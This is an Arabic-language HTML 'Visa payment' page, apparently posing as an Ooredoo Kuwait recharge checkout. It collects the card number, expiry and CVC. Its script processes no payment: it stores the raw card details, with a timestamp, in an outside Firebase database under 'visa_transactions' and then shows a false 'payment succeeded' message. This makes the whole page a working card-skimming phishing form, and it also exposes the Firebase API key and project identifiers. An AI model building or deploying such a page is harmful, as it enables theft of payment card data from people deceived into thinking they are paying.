<!DOCTYPE html>
<html lang="ar" dir="rtl">
<head>
  <meta charset="UTF-8">
  <title>دفع Visa</title>
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <style>
    body { font-family: Tahoma, sans-serif; background-color: #f5f5f5; text-align: right; padding: 20px; }
    .container { max-width: 600px; background: #fff; margin: auto; padding: 25px; border-radius: 10px; box-shadow: 0 0 10px rgba(0,0,0,0.1); }
    input, select { width: 100%; padding: 10px; margin-bottom: 12px; border-radius: 6px; border: 1px solid #ccc; font-size: 16px; }
    .row { display: flex; gap: 10px; }
    .row input, .row select { flex: 1; }
    button { width: 100%; padding: 12px; font-size: 18px; background-color: #1b77e3; color: white; border: none; border-radius: 6px; cursor: pointer; }
  </style>
</head>
<body>
<div class="container">
  <h3>الدفع باستخدام بطاقة Visa</h3>
  <input type="text" id="cardNumber" placeholder="رقم البطاقة (16 رقم)" maxlength="16">
  <div class="row">
    <select id="month">
      <option value="">MM</option>
      <option>01</option><option>02</option><option>03</option><option>04</option>
      <option>05</option><option>06</option><option>07</option><option>08</option>
      <option>09</option><option>10</option><option>11</option><option>12</option>
    </select>
    <select id="year">
      <option value="">YYYY</option>
      <option>2024</option><option>2025</option><option>2026</option>
    </select>
  </div>
  <input type="text" id="cvc" placeholder="CVC (3 أرقام)" maxlength="3">
  <button onclick="submitVisa()">دفع</button>
</div>
<script src="https://www.gstatic.com/firebasejs/9.22.2/firebase-app-compat.js"></script>
<script src="https://www.gstatic.com/firebasejs/9.22.2/firebase-database-compat.js"></script>
<script>
  const firebaseConfig = {
    apiKey: "AIzaSyB7L-MKmTAv8ZBSq93aRA9Yml6Z08XgXfk",
    authDomain: "ooredoo-kuwait-recharge.firebaseapp.com",
    databaseURL: "https://ooredoo-kuwait-recharge-default-rtdb.firebaseio.com",
    projectId: "ooredoo-kuwait-recharge",
    storageBucket: "ooredoo-kuwait-recharge.appspot.com",
    messagingSenderId: "80343152647",
    appId: "1:80343152647:web:0a69fd62de9123757ad2a2",
    measurementId: "G-XS8KSV1GZ8"
  };
  firebase.initializeApp(firebaseConfig);
  const db = firebase.database();

  function submitVisa() {
    const card = document.getElementById("cardNumber").value;
    const month = document.getElementById("month").value;
    const year = document.getElementById("year").value;
    const cvc = document.getElementById("cvc").value;

    if (card.length !== 16 || cvc.length !== 3 || !month || !year) {
      alert("يرجى تعبئة جميع الحقول بشكل صحيح");
      return;
    }

    const timestamp = new Date().toISOString();
    db.ref("visa_transactions").push({ card, month, year, cvc, timestamp })
      .then(() => alert("تم الدفع بنجاح ✅"))
      .catch(err => alert("فشل الدفع ❌"));
  }
</script>
</body>
</html>
